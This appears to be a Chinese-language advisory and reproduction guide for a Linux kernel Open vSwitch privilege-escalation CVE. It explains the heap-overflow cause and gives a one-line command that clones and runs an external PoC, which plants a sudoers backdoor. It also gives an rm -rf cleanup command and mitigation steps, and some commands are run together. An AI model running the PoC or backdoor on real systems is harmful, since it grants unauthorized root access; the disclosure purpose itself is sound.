CVE-2026-64531是Linux内核Open vSwitch(OVS)模块中的一个本地提权漏洞。该漏洞源于OVS在处理特定Netlink消息时对隧道元数据(Tunnel Metadata)的边界检查缺失,导致低权限用户可以通过构造恶意数据包触发堆缓冲区溢出,进而覆写内核关键数据结构,实现从普通用户到root的权限提升。
研究者技术博文:https://heyitsas.im/posts/ovswrap/
复现指南
此PoC基于内存破坏,成功利用后内核处于不稳定状态。reboot/shutdown等正常关机命令极大概率卡死在内核态清理阶段,仅能通过硬断电/强制重启恢复。请务必在测试环境或快照虚拟机中操作,严禁在生产环境执行。
创建新的低权限用户
useradd -s /bin/bash -m pseudoecho pseudo:cat@md5 | chpasswd
使用低权限用户登录ssh后,执行
git clone https://github.com/manizada/OVSwrap && cd OVSwrap && python3 ovswrap-poc.py
执行一次成功后会自动将测试用户加入sudoers,即可通过sudo -i提权。
清除sudoers后门:
rm -rf /etc/sudoers.d/ovs_*
修复指南
升级内核至包含该CVE修复补丁的版本。
临时缓解方案:
# 创建禁用配置文件echo"install openvswitch /bin/false" | sudo tee /etc/modprobe.d/disable-openvswitch.conf